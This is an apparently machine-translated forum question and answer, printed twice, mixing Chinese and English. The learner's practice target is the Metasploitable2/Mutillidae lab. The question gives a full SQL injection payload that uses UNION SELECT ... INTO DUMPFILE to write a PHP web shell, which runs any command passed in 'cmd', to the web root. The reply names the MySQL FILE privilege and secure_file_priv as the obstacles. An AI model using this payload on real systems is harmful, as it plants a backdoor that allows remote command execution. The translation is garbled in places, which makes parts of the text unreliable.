我需要一些帮助 sql 注入
I need some help sql injection
我目前正在使用 php 后门程序在我的本地服务器 (metasploitable2 mutillidate) 上植入 php 文件。我找出了它有多少列并做了一个简单的代码。
' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die;
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --
我将此代码编码成 url 形式并提交,但我失败了。
它给了我不同的错误,但它仍然不起作用。
错误说:'执行查询时出错:无法 create/write 到文件'/var/www/mutillidae/backdoor。php'
我想这与特权有关,但我不确定
执行查询的 MySQL 用户必须将 FILE privilege in order to use SELECT ... INTO OUTFILE or SELECT ... INTO DUMPFILE. Also, if the secure_file_priv 系统变量设置为目录的路径名,您只能写入该目录中的文件。
我目前正在使用 php 后门程序在我的本地服务器 (metasploitable2 mutillidate) 上植入 php 文件。我找出了它有多少列并做了一个简单的代码。
' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die;
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --
我将此代码编码成 url 形式并提交,但我失败了。
它给了我不同的错误,但它仍然不起作用。
错误说:'执行查询时出错:无法 create/write 到文件'/var/www/mutillidae/backdoor。php'
我想这与特权有关,但我不确定
执行查询的 MySQL 用户必须将 FILE privilege in order to use SELECT ... INTO OUTFILE or SELECT ... INTO DUMPFILE. Also, if the secure_file_priv 系统变量设置为目录的路径名,您只能写入该目录中的文件。